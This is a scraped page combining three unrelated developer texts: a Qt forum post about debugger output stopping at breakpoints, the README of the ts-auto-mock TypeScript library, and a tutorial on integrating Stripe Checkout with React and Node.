World"), or only on your actual fair-sized project code? - Karlovsky120 last edited by Yeah, I was a bit stingy with the information. However, I've since discovered that the debugger behavior is consistent, at least when it comes to breakpoints and general code behavior, the only issue is that stopping at a breakpoint stops the program output. For example, the following program gives this output when it hits the breakpoint: #include <QDebug> #include <unistd.h> int main(int argc, char *argv[]) { for (int i = 0; i < 20; ++i) { qDebug() << "Printing line " << i << "\n"; } int a = 0; // <-breakpoint here } 07:50:37: Debugging starts 2020-09-04 07:50:44.162658-0700 editor[3615:65377] Printing line 0 2020-09-04 07:50:44.162689-0700 editor[3615:65377] Printing line 1 2020-09-04 07:50:44.162695-0700 editor[3615:65377] Printing line 2 2020-09-04 07:50:44.162699-0700 editor[3615:65377] Printing line 3 2020-09-04 07:50:44.162702-0700 editor[3615:65377] Printing line 4 2020-09-04 07:50:44.162706-0700 editor[3615:65377] Printing line 5 2020-09-04 07:50:44.162709-0700 editor[3615:65377] Printing line 6 2020-09-04 07:50:44.162713-0700 editor[3615:65377] Printing line 7 2020-09-04 07:50:44.162716-0700 editor[3615:65377] Printing line 8 2020-09-04 07:50:44.162720-0700 editor[3615:65377] Printing line 9 2020-09-04 07:50:44.162724-0700 editor[3615:65377] Printing line 10 2020-09-04 07:50:44.162727-0700 editor[3615:65377] Printing line 11 2020-09-04 07:50:44.162731-0700 editor[3615:65377] Printing line 12 2020-09-04 07:50:44.162735-0700 editor[3615:65377] Printing line 13 2020-09-04 07:50:44.162751-0700 editor[3615:65377] Pri It just stops mid string like this. I've tried redirecting output to the terminal, but that just exits right away, without outputting anything. If I add usleep(20000); above the print line, it will print out all (20) of the strings. If I add usleep(10000); it will get to number 16. I'm using QtCreator 4.13.0, Qt 5.15.0. I'm using Clang that came with MacOS Catalina (x86 64bit in /usr/bin). I'm using LLDB that came with it (also in /usr/bin/lldb). This is a fresh install of the OS, there is nothing else installed on the system except the programs that came with it. MacOS version is 10.15.5.
https://forum.qt.io/topic/118711/qtcreator-debugger-not-behaving-deterministically
CC-MAIN-2021-43
refinedweb
969
64.2
TS auto mockTS auto mock Need help? Join us on Slack A TypeScript transformer that will allow you to create mocks for any types (interfaces, classes, etc.) without the need to create manual fakes/mocks. API Documentation Installation Usage Quick overviewQuick overview import { createMock } from 'ts-auto-mock'; interface Person { id: string; getName(): string; details: { phone: number } } const mock = createMock<Person>(); mock.id // "" mock.getName() // "" mock.details // "{ phone: 0 }" - If you are interested to use it with jasmine please go to jasmine-ts-auto-mock - If you are interested to use it with jest please go to jest-ts-auto-mock ChangelogChangelog Find the changelog here: Changelog. RoadmapRoadmap You can find the roadmap of this project on the Wiki page: Roadmap. Do you want to contribute?Do you want to contribute? AuthorsAuthors Contributors ✨ Thanks goes to these wonderful people (emoji key): This project follows the all-contributors specification. Contributions of any kind welcome! LicenseLicense This project is licensed under the MIT License.
https://www.npmjs.com/package/ts-auto-mock
CC-MAIN-2021-39
refinedweb
162
57.87
Lpg Prins Vsi Software [UPDATED] Download Lpg Prins Vsi Software Download Prins VSI (VSI 1) LPG Transformer, regulators, fuel tank, and pump. Prins VSI LPG System Software. Prins VSI Configuration Software Main Menu – 8006E001. 1) Prins VSI LPG Fuel system Software. New/Latest download version of the VSI Configuration Software for Prins VSI Fuel system is 1. 1 as follows. Prins VSI LPG Fuel Configuration Software. Company, serving our customers. to the Prins LPG & CNG delivery program for modern DI engines!. Click here to download the {NamedMap} from ‘../../../number/named_map’; import {Tensor} from ‘../../../number/tensor_types’; import {TensorShape} from ‘../../../shape’; import {assertMainThread} from ‘../../../util/testing_env’; import {DefaultValue} from ‘../default_value’; import {indexOf} from ‘../../../utils/search’; describe(‘DefaultValue’, () => { let inputShape; let offset; let numRows; beforeEach(() => { inputShape = new TensorShape({ numRows: 4, dimensions: [2, 2], }); offset = new Tensor([[0, 0], [1, 0]], [1, 2]); }); it(‘is equivalent to new DefaultValue()’, () => {- Fotos von plänen bedarf prins vsi Prins VSI LPG Configuration and Diagnostic Software – Business Edition.. Free prins vsi download software at UpdateStar – 1,746,000 recognized programs . The VSI system is available in an LPG as well as a CNG version and is also suitable for the latest generation. Prins vsi 2 software parameters found at bexprins.de, prinsautogas.. Download the latest free cracks no cd fixed exe for GTR 2. Software for diagnostic and configure PRINS VSI Systems.. Free Print Software Download; Prince Software. Prins Autogassytemen BV, a partner of SHV Gas, has been a world leader in the development of alternative fuel . BEXPRO-NS Business Edition Software for Prins VSI 1 – DOWNLOAD.. which has been programmed to help you to configure the Prins VSI LPG system. The VSI system is the most advanced vapour injection system on the market.. High-quality components; Unique diagnostic software; Optimal performance. The number of LPG and CNG systems for cars with a direct injection fuel system is. If you require more information, you can download our brochure or contact us. Prins Vsi Diagnostic Software.. With this program you can analyze and scan local Bluetooth network using Microsoft Windows XP SP2 or Microsoft Windows Vista. The programs works on Windows XP only.Anymore info do not hesitate to ask. All files will be sent as a download link to your email address within hours- . Components Advanced calibration possibilities Diagnostic software in native language The entire new Prins VSI-2.0 system is the latest develop- LPG Reducer Watch More Princess Vs. Sister – Full-Length Movie – Viennale online, You can watch Princess Vs. Sister – Full-Length Movie – Viennale online on Apple iTV or iPad, Android or iPhone, streaming online (1,2,3 or 4 video stream) full the FreeInternet! Watch Princess Vs. Sister – Full-Length Movie – Viennale video trailer in HD 720p. Princess vs. Sister Full-length Feature Movie. Video – Watch Full Movie Princess Vs. Sister 2016 Full Video Online Princess Vs. Sister Full-length Feature Movie. Watch Princess Vs. Sister Full-length Movie – Viennale online 6d1f23a050
https://hhinst.com/advert/lpg-prins-vsi-software-updated-download/
CC-MAIN-2022-40
refinedweb
489
61.22
Technical Support On-Line Manuals RL-ARM User's Guide (MDK v4) #include <net_config.h> BOOL modem_process ( U8 ch ); /* New character sent by the modem. */ The modem_process function processes characters that the local modem sends to the TCPnet system. The function stores each character in a buffer and checks the buffer for a valid modem response. The argument ch is the new character that is available from the modem. The modem_process function for the null modem is in the RL-TCPnet library. The prototype is defined in net_config.h. If you want to use a standard modem connection, you must copy std_modem.c into your project directory. note The modem_process function returns __TRUE when it receives the response "CONNECT" from the local modem. This means that the local modem has connected to the remote modem. Otherwise, it returns __FALSE. modem_online, modem_run BOOL modem_process (U8 ch) { /* Modem character process event handler. This function is called when */ /* a new character has been received from the modem in command mode */ if (modem_st == MODEM_IDLE) { mlen = 0; return (__FALSE); } if (mlen < sizeof(mbuf)) { mbuf[mlen++] = ch; } /* Modem driver is processing a command */ if (wait_for) { /* 'modem_run()' is waiting for modem reply */ if (str_scomp (mbuf,reply) == __TRUE) { wait_for = 0; delay = 0; if (wait_conn) { /* OK, we are online here. */ wait_conn = 0; modem_st = MODEM_ONLINE; /* Inform the parent process we are online now. */ return (__TRUE); } } } /* Watch the modem disconnect because we do not use CD line */ if (mem_comp (mbuf,"NO CARRIER",10) == __TRUE) { set_mode (); } if (ch == '\r' || ch == '\n') { flush_buf (); } /* Modem not connected, return FALSE */.
https://www.keil.com/support/man/docs/rlarm/rlarm_modem_process.htm
CC-MAIN-2020-34
refinedweb
255
64.51
Many Sitecore developers these days use the Advanced Database Crawler (ADC) as their interface into the Lucene.NET world. The ADC is a great tool because it builds on top of the Sitecore.Search namespace which in its own right wraps over Lucene.NET. Many Sitecore instances will contain multiple sites and share data across them. Sometimes its necessary to build a site-specific search mechanism that functionally works the same for each site, but ensures results are only for the given site. This blog post will go over two simple ways to accomplish this with the Advanced Database Crawler. Location Filter The easiest way to accomplish this task to filter results by a managed site is to use the LocationIds filter on the search parameter object. This location filter will only return SkinnyItem results that fall at or under the provided location. The LocationIds also happens to be a delimited list of GUIDs, so we can easily leverage this to filter results by site: - Get the context site path - Filter with the ADC using LocationIdsby passing the home page’s or site root’s GUID For example, here’s some basic code to do just that: Item homeItem = Sitecore.Context.Database.GetItem(Sitecore.Context.Site.StartPath); if(homeItem != null) { searchParams.LocationIds = homeItem.ID.ToString(); } This example assumes your home page is below the site root path, which is common if you have some other data items for your site that are not pages. Full Path Dynamic Field Another way to do the same type of operation takes a bit more work and doesn’t necessarily yield any better results, however it’s good to have options! This approach requires to you define a dynamic field in your index for the full path of each item. If you’re using v1 of the ADC, this exists as the “_fullcontentpath” dynamic field. If you’re using the ADC v2, you’ll need to define it (grab it from here). Once you configure that dynamic field, simply write some code to compare the skinny items from a search operation based on the full path vs. the context site’s start path. Here’s an example: public static IEnumerable<SkinnyItem> FilterSkinnyItemsByContextSite(IEnumerable<SkinnyItem> items) { return FilterSkinnyItemsBySite(items, Sitecore.Context.Site); } public static IEnumerable<SkinnyItem> FilterSkinnyItemsBySite(IEnumerable<SkinnyItem> items, Sitecore.Sites.SiteContext site) { return FilterSkinnyItemsByRootPath(items, site.RootPath); } public static IEnumerable<SkinnyItem> FilterSkinnyItemsByRootPath(IEnumerable<SkinnyItem> items, string siteRootPath) { // isolate the path query to a finite item path, not a prefix of a longer path // e.g. ensures a filter on /sitecore/content/brand as /sitecore/content/brand/ to avoid allowing /sitecore/content/brand2 if (!siteRootPath.EndsWith("/")) siteRootPath = siteRootPath + "/"; return items.Where(si => si.Fields["_fullcontentpath"].StartsWith(siteRootPath, StringComparison.InvariantCultureIgnoreCase)); } As I said before, leveraging the LocationIds filter at the search-level is easier and more efficient as it won’t return unnecessary results. The second approach is good if you have existing search code that you don’t want to adjust too much and instead want to easily filter the results by site. 3 thoughts on “Sitecore Search by Site with the Advanced Database Crawler” I would like to index the full path, but where exactly do I put the code snippet you give that defines FullPathField? There are two links in the post you should look at, the sample config file that defines the field and the class that resolves the value of the field:
https://firebreaksice.com/sitecore-search-by-site-with-the-advanced-database-crawler/
CC-MAIN-2020-05
refinedweb
572
51.48
Create a reference to a stream #include <screen/screen.h> int screen_ref_stream(screen_stream_t stream) Function Type: Immediate Execution This function creates a reference to a stream. This function can be used by libraries to prevent the stream or its buffers from disappearing while the library is using it. The stream and its buffers aren't destroyed until all references have been cleared with screen_unref_stream(). In the event that a stream is destroyed before the reference is cleared, screen_unref_stream() causes the stream buffer and/or the stream to be destroyed. 0 if successful, or -1 if an error occurred (errno is set; refer to errno.h for more details).
http://www.qnx.com/developers/docs/7.0.0/com.qnx.doc.screen/topic/screen_ref_stream.html
CC-MAIN-2018-22
refinedweb
108
65.12
In this article, we will learn how to integrate “Stripe Checkout” with React with Hooks and Node js. However, if you would rather prefer to use Angular, here’s a guide we created for that. What is Stripe Checkout? Stripe Checkout is a fully responsive and secure payment page hosted by Stripe. It lets you quickly receive payments and remove the friction of developing a compliant checkout page. Goal Today, we will learn how to: 1. How to create a product in your Stripe dashboard. 2. Integrate that product in our React js checkout component 3. Successfully communicate with our server and redirect to the Stripe Checkout page. Prerequisites - Basic Knowledge of React js and React Hooks. - Nodejs version 10 or later - React 16.8 or later Create a Product However, before we start coding, let’s create a sample product which we will display on our checkout page. 1. Create a Stripe account Note: All product-related data and keys will be created in developers’ “test mode”. Sensitive data for production should be saved securely in your .env files. - Head over to Stripe’s website and create an account. - Upon creating your account, you will be directed to your dashboard page. 2. Create a Product To do this, click on the Products link by the side and click the “Add Product” button. You can fill in the product details as shown below. Also, make sure you save the Product and also copy the price API ID for later use Stripe Checkout Integration Integrating our Stripe product requires two steps: Setting up our node server and calling our stripe product API in our React app. 1. Create-react-app Let’s create our project using create-react-app using the command below: npx create-react-app stripe-react-app 2. Setup a Node Express server Next, we have to setup up our node server. To do this, we will install express and concurrently. Concurrently will allow us to run our node server and React app at the same time. npm i concurrently; npm i express 3. Install Stripe To use Stripe in our app, we will be installing three packages: stripe, react-stripe, and stripe-js packages. Here’s the final version of our package.json file. { "name": "stripe-react-app", "version": "0.1.0", "private": true, "dependencies": { "@stripe/react-stripe-js": "^1.4.1", "@stripe/stripe-js": "^1.17.0", "@testing-library/jest-dom": "^5.11.4", "@testing-library/react": "^11.1.0", "@testing-library/user-event": "^12.1.10", "concurrently": "^6.2.1", "express": "^4.17.1", "react": "^17.0.2", "react-dom": "^17.0.2", "react-scripts": "4.0.3", "stripe": "^8.169.0", "web-vitals": "^1.0.1" }, "homepage":"", "proxy": "", "scripts": { "start-client": "react-scripts start", "start-server": "node server.js", "start": "concurrently \"yarn start-client\" \"yarn start-server\"", "build": "react-scripts build", "test": "react-scripts test", "eject": "react-scripts eject" }, "eslintConfig": { "extends": [ "react-app", "react-app/jest" ] }, "browserslist": { "production": [ ">0.2%", "not dead", "not op_mini all" ], "development": [ "last 1 chrome version", "last 1 firefox version", "last 1 safari version" ] } } You will notice how we set values for proxy and homepage. Similarly, we also used concurrently to start our node server and react app at the same time. 7. Server.js Create a server.js file in our home directory. Inside our server.js file, we will - Instantiate required packages - Create an API route: create-checkout-session. In this route, we will define payment_method_types, price, quantity, and the success_url and cancel_url The final version of the server.js file will be const stripe = require('stripe')('sk_test_***************************************'); const express = require('express'); const app = express(); app.use(express.static('.')); const YOUR_DOMAIN = ''; app.post('/create-checkout-session', async (req, res) => { const session = await stripe.checkout.sessions.create({ payment_method_types: [ 'card' ], line_items: [ { // TODO: replace this with the `price` of the product you want to sell // price: '{{PRICE_ID}}', price: 'price_*************', quantity: 1, }, ], mode: 'payment', success_url: `${YOUR_DOMAIN}?success=true`, cancel_url: `${YOUR_DOMAIN}?canceled=true`, }); res.redirect(303, session.url) }); app.listen(5000, () => console.log('Running on port 5000')); You can find your secret API key in your dashboard. It starts with: sk_test. You also get to use your product’s price ID in this file. Frontend: React App In this section, we will be building our frontend components. Our frontend will comprise of our main page which will house the product card and a result page that will show if the checkout was successful or not. 8. Product Card - First, we will create a components folder inside the src folder that will house our frontend files. - Next, create ProductDisplay.js and Message.js files. The ProductDisplay.js will display the product card and the Message.js will display the message gotten from our Stripe Checkout. export const ProductDisplay = () => ( <div className="wrapper"> <div className="product-img"> <img src="" alt="Orchid Flower" height="420" width="327" /> </div> <div className="product-info"> <div className="product-text"> <h1>Orchid Flower</h1> <h2>POPULAR HOUSE PLANT</h2> <p> The Orchidaceae are a diverse and <br /> widespread family of flowering plants, <br /> with blooms that are often <br /> colourful and fragrant.{" "} </p> </div> <form action="/create-checkout-session" method="POST"> <div className="product-price-btn"> <p> <span>$20</span> </p> <button type="submit">buy now</button> </div> </form> </div> </div> ); ProductDisplay.js export const Message = ({ message }) => ( <section> <p>{message}</p> <a className="product-price-btn" href="/"> <button type="button">Continue</button> </a> </section> ); Message.js And here’s our App.js file where both components are called. import React, { useState, useEffect } from "react"; import "./App.css"; import { ProductDisplay } from "./components/ProductDisplay"; import { Message } from "./components/Message"; export default function App() { const [message, setMessage] = useState(""); useEffect(() => { // Check to see if this is a redirect back from Checkout const query = new URLSearchParams(window.location.search); if (query.get("success")) { setMessage(" Yay! Order placed! 🛒 You will receive an email confirmation confirming your order."); } if (query.get("canceled")) { setMessage( "Order canceled -- please try again." ); } }, []); return message ? <Message message={message} /> : <ProductDisplay />; } Project Structure Here’s the final structure of the project: Run npm start to start the project. You can find a couple of test card numbers provided by Stripe here which you can use to test the Stripe checkout page. Summary There you have it. With Stripe Checkout and React, you can create a seamless eCommerce experience for your customers. I hope that you have enjoyed reading this article. Feel free to share and add your valuable comments. We are always eager to hear the opinions from fellow developers. Unimedia Technology Here at Unimedia Technology we have a team of React Developers that can help you develop your most complex stripe integrations.
https://www.unimedia.tech/2021/08/17/stripe-checkout-integration-with-react/?lang=ca
CC-MAIN-2022-27
refinedweb
1,108
60.01